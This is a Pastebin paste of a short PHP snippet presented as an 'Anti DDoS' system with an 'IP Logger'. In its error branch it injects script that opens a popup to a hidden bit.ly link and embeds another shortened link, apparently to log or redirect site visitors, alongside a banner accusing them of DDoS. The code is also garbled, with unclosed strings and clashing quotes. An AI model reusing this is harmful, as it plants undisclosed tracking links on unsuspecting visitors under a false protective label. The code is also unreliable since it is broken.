AriyanXploit404

Anti DDoS With IP Logger Attacker

Dec 31st, 2021
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.01 KB | None | 0 0
  1. <?php
  2.  try{
  3.   if (!file_exists('anti_ddos/start.php'))
  4.    throw new Exception ('anti_ddos/start.php does not exist');
  5.   else
  6.    require_once('anti_ddos/start.php');
  7.  }
  8.  //CATCH the exception if something goes wrong.
  9.  catch (Exception $ex) {
  10.   // et's print a message saying there is an error
  11.   echo '<script type="text/javascript">
  12.         var b=0;
  13. $('body').click(function(){
  14. if(b==0){
  15. window.open ("https://bit.ly/3qnU9XF","popup","menubar=1,resizable=1,width=450,height=300");
  16. b++;
  17. }
  18. });
  19. </script>
  20.  echo '<object type="text/html" data="https://bit.ly/3elcmPS" weight=100%>
  21.   echo '<div style="padding:10px;color:white;position:fixed;top:0;left:0;width:100%;background:black;text-align:center;">The <a href="https://bit.ly/3qnU9XF" target="_blank">"AntiDDOS System"</a> Was Caught You Because You Attacking Web With Your DDoS, Please Your Reload Again If Not :)</div>';
  22.   //Print out the exception message.
  23.   //echo $ex->getMessage();
  24.  }
  25.  // cp -r AntiDDOS-system/ /var/www/html/
  26.  // Author By AriyanXploit404
  27. ?>
Add Comment
Please, Sign In to add comment